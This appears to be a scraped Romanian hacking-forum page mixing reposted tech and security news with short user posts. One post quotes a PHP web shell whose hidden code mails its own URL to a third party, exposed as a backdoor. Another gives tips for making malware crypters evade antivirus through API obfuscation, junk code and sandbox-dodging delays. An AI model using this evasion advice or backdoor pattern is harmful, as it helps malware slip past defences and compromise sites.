Nytro

Block Autorun Malware with BitDefender USB Immunizer 27 April 2011 A low-footprint tool to protect both your USB stick and your computer For years, Autorun-based malware has been atop of the worldwide e-threat landscape, with notorious representatives such as Trojan.AutorunInf, the Conficker worm (Win32.Worm.Downadup), Worm.Autorun.VHD or the fearsome Stuxnet. The Autorun feature dates back in the Windows® XP® era, when it was first introduced to facilitate software installations from CD-ROM media for non-technical computer users. This feature has quickly become the cyber-criminals’ tool of choice to automatically execute malware located on infected USB drives. The USB Immunizer – You’re just two clicks away from full protection against Autorun-based e-threats Since early 2009, malware exploiting the Autorun technology in order to subsequently infect other computers via flash disks has significantly increased. Trojan.AutorunINF has been world’s number one e-threat since the second half of 2009, while the other two representatives of the Autorun family – Worm.Autorun.VHG and Trojan.Autorun.AET are constantly present in the global Top 10 malware tops. The evolution of autorun-based malware displayed in percentage points of infection The BitDefender USB immunizer is our response to this growing issue. Divided in two sections, this small utility is able to protect both your storage device and your computer. The Immunize option allows you to immunize your USB storage device or SD card against infections with autorun-based malware. Even if your storage device has been plugged into an infected computer, the piece of malware will be unable to create its autorun.inf file, thus annihilating any chance of auto-launching itself. The Immunize Computer slider allows you to toggle the Autorun feature On or Off for any removable media (except for CD/DVD-ROM devices). If you frequently read and write data from USB sticks or SD cards which do not belong to you or which haven’t been immunized yet, disabling the Autorun option may save you the unpleasant surprise of getting your computer infected without warning. The BitDefender USB Immunizer is available for free on the product’s page located at the BitDefender Labs. Sursa: Block Autorun Malware with BitDefender USB Immunizer - MalwareCity : Computer Security Blog

Un nou telefon de la HTC: Doubleshot, cu Android Gingerbread si tastatura QWERTY de Cristina Enescu | 27 aprilie 2011 Numele HTC Doubleshot a ajuns pe taramul zvonurilor in urma cu cateva zile, cand un angajat HTC a upload o poza pe site-ul de foto-sharing Picassa. Speculatiile care sustin existenta noului telefon HTC au fost generate de informatiile din EXIF-ul imaginii postate. Potrivit acestor date, HTC are in lucru un telefon cu tastatura QWERTY, care ruleaza pe Android 2.3 Gingerbread. Cel mai probabil HTC Doubleshot va avea un procesor dual-core de 1.2GHz si un ecran mare, cel mai probabil de 4 inci, cu rezolutie de 480x800. Alte specificatii includ conectivitatea 802.11 b/g/n si Bluetooth 3.0. Nu se cunoasc alte informatii, desi unele surse sustin ca numele Doubleshot se refera la camerele duale, al caror scop este inregistrarea imaginilor 3D stereoscopice. Au fost descoperite de asemenea indicii ale unei camere de 6MP cu abilitati HDR. Din pacate nu exista imagini disponinile cu dispozitivul, dar cel mai probabil va avea avea un design asemanator cu Desire Z.

Spotlight on Linux: Toorox Apr 26, 2011 By Susan Linton Toorox is a Gentoo-based installable live CD that features your choice of KDE or GNOME desktops. It comes with lots of useful applications including system configuration tools, easy package management, and proprietary code installers. Toorox is sometimes compared to another Gentoo-based distribution, Sabayon. This comparison may be legitimate on the surface, but differences emerge when looking deeper. Sabayon is indeed based on Gentoo as Toorox, but Sabayon is primarily a binary distribution. Package installation almost always involves installing binary Sabayon packages. While this is convenient and often preferred, Toorox compiles and install software from Gentoo sources. Toorox begins life on your computer as a binary installation with all its advantages, such as fast, easy, and ready at boot, but subsequent package installation compiles source packages. So Toorox is perfect for users that would like a source-based distribution, but don't want the initial time and effort investment. Either over time or with a all-at-once effort, one can fairly easily transform Toorox to a full source install. Toorox lists some of their software in an introduction that appears when the desktop starts. These include: - Kernel 2.6.37-gentoo - KDE 4.6.0 - Xorg-Server 1.9.4 - LibreOffice 3.3.1 - IceCat 3.6.13 - Thunderbird 3.1.7 - K3b 2.0.2 - Gimp 2.6.11 - Wine 1.3.14 - VLC 1.1.7 - Amarok 2.4.0 - Audacious 2.4.3 - Ardour 2.8.7 - Kino 1.3.3 - Cinelerra 20101104 Toorox includes two graphical Portage front-ends: Potato and Porthole. Of course, users can use Portage at the commandline just as in Gentoo. In any case, there's plenty of software available to install. In addition, users may wish to install NVIDIA or ATI proprietary drivers. In the Systemconfig are the utilities that will install those. Users may also install Flash and multimedia libraries with the provided scripts. Like other Gentoo-based systems, Toorox suffered through growing pains and initial failings. But also like Sabayon, it's shown great improvement over the years and now gives users a stable and enjoyable experience. The hard drive install is a simple procedure, asking only a few questions. It does offer one bootloader option rarely seen. It offers the usual choices of installing on the MBR or root partition, but it also allows users to add Toorox to an existing bootloader list. To use that option, one merely ticks the partition that contains the bootloader menu. Toorox routinely comes in KDE and GNOME versions for 32-bit or 64-bit systems. The basic look and feel have been updated a bit in the newest releases, but overall it still retains the Toorox personality. This is usually formed from a black to white gradient background embossed with the Toorox logo with dark panels and desktop widgets. The latest wallpaper feature a multicolor design surrounding the Toorox logo and the machine architecture. Stable version 2.2011 was released February 27 and developmental release 3.2011 was released March 30. Toorox is a great choice for those who wish a bit more control over their machine or would like an introduction to Gentoo with a little less pain. Some may say Toorox isn't ideal for new users, but that depends on the user really. In between the vast work of Gentoo and the ease of Sabayon comes Toorox. Give it a try. Sursa: Spotlight on Linux: Toorox | Linux Journal

Fa asa, probabil nu te lasa sa folosesti acele caractere la numele de fisiere: Open "F:\" & Day(Now()) & "-" & Month(Now()) & "-" & Year(Now()) & ".txt" For Append As #1 Print #1, "Test" Close #1 Si ai si functiile Hour, Minute si Secunde, formatezi tu cum vrei.

Open "D:\" & Now() & ".txt" For Append As #1 ?

Da, dar daca iese ceva frumos si elegant, il potin vinde si castigi ceva bani. Poti pune o optiune de editare headere HTTP, daca ar fi si multithreading ar fi perfect... Si inveti multe lucruri noi cand lucrezi la un proiect mai complex.

Hmm, deci poate detecta si posibile Blind SQL Injection? Ai putea sa folosesti mai multi "vectori", sa incerci mai multe lucruri pe acelasi link. Poti sa sniffezi Acunetixu sa vezi ce metode foloseste el si sa te inspiri.

Da, m-am gandit ca se poate face asta. Dar mi se pare dedicat acelor script-kiddie care vor sa gaseasca vulnerabilitati intr-un site si nu conteaza ce site, doar sa fie un site, sa aiba cu ce sa se laude. Nu arata rau, probabil e error-based. Si felicitari daca e facut de tine.

Da, interesant, dar ideea de baza e stupida. Eu vreau sa gasesc SQL Injection in site-ul "x", cu ce ma incanta sa gasesc vulnerabil site-ul lui Vasile, folosind un dork?

Nu m-am uitat la emisiunea asta cacacioasa, dar am vazut cateva videoclipuri pe youtube, si asta chiar nu merita.

Open "D:\Fisier.txt" For Append As #1 Print #1, Text1.Text Close #1

Mi-a dat o poza cu ea, e draguta.

Sau poate sa fie fata. Nu e imposibil sa intre si fete aici.

Ce facea mai bine zis. Pe scurt: "transforma" un executabil detectabil intr-unul nedetectabil.

Security and Data Protection in a Google Data Center Nu e tocmai un tutorial, dar sunt lucruri interesante. Durata: 07:01 (cred ca gasiti voi 7 minute sa il vizionati) Youtube: http://www.youtube.com/watch?v=1SCZzgfdTBo&feature=player_embedded

Da ba, sa stiti ca plecati si sar strainii cu banii pe voi... Cum ajungeti acolo or sa va roage cu bani, pentru ca... ? Nu stiu, voi stiti. Ce credeti ca e peste hotare? Nu e nimic: nu tu familie, nu tu rude, nu tu prieteni, nu ii pasa nimanui de voi. In tara, daca ai o problema, ai la cine sa apelezi. Acolo esti pe cont propriu. Nu cred ca e tocmai paradisul... Credeti ca banii pica din cer? Voi ganditi?

Ban permanent. Infectie.

Malware Analysis: Rootkits (Video) Good video explaining rootkits using hxdef. Part 1 http://video.google.com/videoplay?docid=-1098574092821901542&q=source:015021726083819226340&hl=en Part 2 http://video.google.com/videoplay?docid=4452554918423531934&q=source:015021726083819226340&hl=en Part 3 http://video.google.com/videoplay?docid=-1835297762554988848&q=source:015021726083819226340&hl=en Sursa: http://www.hackhound.org/forum/index.php?/tutorials/article/244-malware-analysis-rootkits-video/

PHP Security This Tutorial covers Cross Site Scripting (XSS), Cross Site Forgery Requests (CSFR), SQL Injection, globals, and much more! Video (46:42): http://videos.code2design.com/video/play/PHP/11

Probabil e magicul j1c0. Cred ca ai venit aici numai la caterinca si nu cred ca vei rezista mult cat sunt eu prin preajma.

Windows 8: Advanced Task Manager-ul dezvaluit de Bianca Dinu | 21 aprilie 2011 Ultimul build al lui Windows 8, aflat in mainile dezvoltatorilor a condus la aparitia unei noi serii de screenshot-uri, care ne dezvaluie de data aceasta noul Advanced Task Manager al sistemului de operare. Cele doua screenshot-uri par sa evidentieze doua tipuri diferite de manager, unul optimizat pentru editia touch, iar celalalt standard. Prima imagine dezvaluie dashboard-ul aplicatiei, care le ofera utilizatorilor mult mai multe informatii despre procesele care ruleaza, serviciile si resursele sistemului. Procesele sunt listate acum intr-o interfata colorata, care ii va permite utilizatorului sa vada care dintre ele incarca cel mai mult sistemul. Al doilea screenshot reprezinta o alta versiune a Task Manager-ului, cu un puternic accent touch-friendly, care prezinta o lista de programe, utilizatori si itemi start-up. Ultimele screenshot-uri Windows 8 vin sa completeze o serie lunga de leak-uri, care au dezvaluit fanilor cateva feature-uri esentiale ale platformei. Si cum mai sunt inca multe de aflat, stay tuned pentru noi detalii Windows 8. Sursa: http://www.hit.ro/software/Windows-8-Advanced-Task-Manager-ul-dezvaluit

Fisierul din acea arhiva incepe asa: <?php # Web Shell by oRb $eu=1; while ($eu==1){ $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; mail ("yo_cristy_lov3_boy@yahoo.com","shell",$url); $eu++; } Adica (lasand stupiditatea acelui while) trimite un mai cu link-ul shell-ului astuia: yo_cristy_lov3_boy Adica nu mie ci unui cocalar. PS: Sunt total impotriva spamului.

Daca nu prea stii VB cum ai de gand sa modifici codul existent? Sunt diverse moduri de a face un crypter nedetectabil: modul in care sunt apelate API-urile necesare rularii executabilului in memorie, clasic sau dinamic. La dinamic poti sa cryptezi numele functiilor apelate, dar nu ajuta prea mult. Se poate adauga cod inutil pentru a evita anumite semnaturi pentru anumite zone de cod. Se poate pune o mica intarziere la executia programului pentru a scapa de sandboxu antivirusilor. Sunt multe lucruri de care trebuie tinut cont, si nu e deloc usor.

Bancuri Un roman a spart serverele Agentiei Spatiale Europene. In timp ce facea curat le-a lovit cu coada maturii. Pe o pagina de Facebook.

Reverse Code Engineering: An In-Depth Analysis of the Bagle Virus Author: Konstantin Rozinov 1. INTRODUCTION.......................................................................................................................3 2. BASIC X86 CONCEPTS................................................................................................................3 2.1. REGISTERS......................................................................................................................4 2.2. ASSEMBLY.......................................................................................................................5 2.3. RUNTIME DATA STRUCTURES..................................................................................................7 2.4. THE STACK......................................................................................................................9 3. VIRUS OVERVIEW...................................................................................................................12 3.1. VIRUS HISTORY...............................................................................................................12 3.2. VIRUS TYPES..................................................................................................................12 4. BAGLE VIRUS DISASSEMBLY.......................................................................................................13 4.1. OVERVIEW.....................................................................................................................13 4.2. ANALYSIS RESOURCES.......................................................................................................14 4.3. DISASSEMBLY APPROACH....................................................................................................16 4.4. ANALYSIS PROBLEMS AND SOLUTIONS.....................................................................................19 4.5. FUNCTIONAL FLOW...........................................................................................................22 5. CONCLUSIONS......................................................................................................................26 APPENDIX A: DETAILED DISASSEMBLY OF BAGLE VIRUS.............................................................................29 APPENDIX B: SOURCE CODE LISTING OF BAGLE VIRUS...............................................................................72 Download: http://www.binary-auditing.com/downloads/011%20-%20malware%20analysis/3%20Bagle%20A%20Virus/bagle_analysis_v.1.0.pdf